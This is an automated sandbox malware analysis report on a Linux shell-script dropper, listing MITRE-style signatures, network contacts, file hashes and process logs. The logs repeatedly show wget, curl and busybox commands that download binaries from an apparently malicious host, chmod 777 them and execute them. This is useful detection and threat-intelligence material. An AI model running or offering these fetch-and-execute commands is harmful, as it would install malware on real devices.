Malware Analysis Report

2025-05-06 04:15

Sample ID 241025-bgvp8szglm
Target 1fe6de8ea9975b311fc0e7781eb48271.bin
SHA256 d44ff432211daf9c1be45ff0a6c526870a8a142de999a752c9c35c569a8bd6c9
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d44ff432211daf9c1be45ff0a6c526870a8a142de999a752c9c35c569a8bd6c9

Threat Level: Shows suspicious behavior

The file 1fe6de8ea9975b311fc0e7781eb48271.bin was found to show suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:07

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

9s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

Network

Country Destination Domain Proto Count
US 1.1.1.1:53 conn.masjesu.zip udp 2

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

debian9-mipsbe-20240611-en

Max time kernel

151s

Max time network

155s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target Count
N/A N/A /bin/chmod N/A 16

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg N/A
N/A /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 N/A
N/A /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb N/A
N/A /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE N/A
N/A /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm N/A
N/A /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO N/A
N/A /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM N/A
N/A /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY N/A
N/A /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB N/A
N/A /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi N/A
N/A /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A
N/A /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A

Reads runtime system information

discovery
Description Indicator Process Target Count
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A 17

System Network Configuration Discovery

discovery
Description Indicator Process Target Count
N/A N/A /usr/bin/curl N/A 17
N/A N/A /usr/bin/wget N/A 17
N/A N/A /bin/busybox N/A 16

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /usr/bin/curl N/A
File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /usr/bin/curl N/A
File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /usr/bin/curl N/A
File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /usr/bin/curl N/A
File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /usr/bin/curl N/A
File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /usr/bin/curl N/A
File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /usr/bin/curl N/A
File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/chmod

[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/rm

[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/chmod

[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23

[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/rm

[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/chmod

[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb

[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/rm

[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/chmod

[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE

[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/rm

[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/chmod

[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm

[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/rm

[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/chmod

[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO

[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/rm

[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/chmod

[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM

[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/rm

[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/chmod

[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY

[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/rm

[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/chmod

[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB

[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/rm

[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/chmod

[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi

[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/rm

[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/chmod

[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8

[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/rm

[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/chmod

[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF

[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/rm

[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

Network

Country Destination Domain Proto Count
US 1.1.1.1:53 conn.masjesu.zip udp 50
BG 87.120.126.196:80 conn.masjesu.zip tcp 18
DE 87.120.84.230:80 conn.masjesu.zip tcp 32

Files

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

debian9-mipsel-20240611-en

Max time kernel

118s

Max time network

120s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target Count
N/A N/A /bin/chmod N/A 28

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg N/A
N/A /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 N/A
N/A /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb N/A
N/A /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE N/A
N/A /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm N/A
N/A /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO N/A
N/A /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM N/A
N/A /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY N/A
N/A /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB N/A
N/A /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi N/A
N/A /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A
N/A /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A
N/A /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF N/A
N/A /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 N/A
N/A /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb N/A
N/A /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE N/A
N/A /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm N/A
N/A /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg N/A
N/A /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO N/A
N/A /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM N/A
N/A /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY N/A
N/A /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB N/A
N/A /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi N/A
N/A /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 N/A

Reads runtime system information

discovery
Description Indicator Process Target Count
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A 28

System Network Configuration Discovery

discovery
Description Indicator Process Target Count
N/A N/A /usr/bin/curl N/A 25
N/A N/A /usr/bin/wget N/A 20
N/A N/A /bin/busybox N/A 19

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /usr/bin/curl N/A
File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /usr/bin/curl N/A
File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /usr/bin/curl N/A
File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /usr/bin/curl N/A
File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /usr/bin/curl N/A
File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /usr/bin/curl N/A
File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /usr/bin/curl N/A
File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /usr/bin/curl N/A
File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /usr/bin/curl N/A
File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /usr/bin/curl N/A
File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /usr/bin/curl N/A
File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /usr/bin/curl N/A
File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /usr/bin/curl N/A
File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /usr/bin/curl N/A
File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /usr/bin/curl N/A
File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /usr/bin/curl N/A
File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/chmod

[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

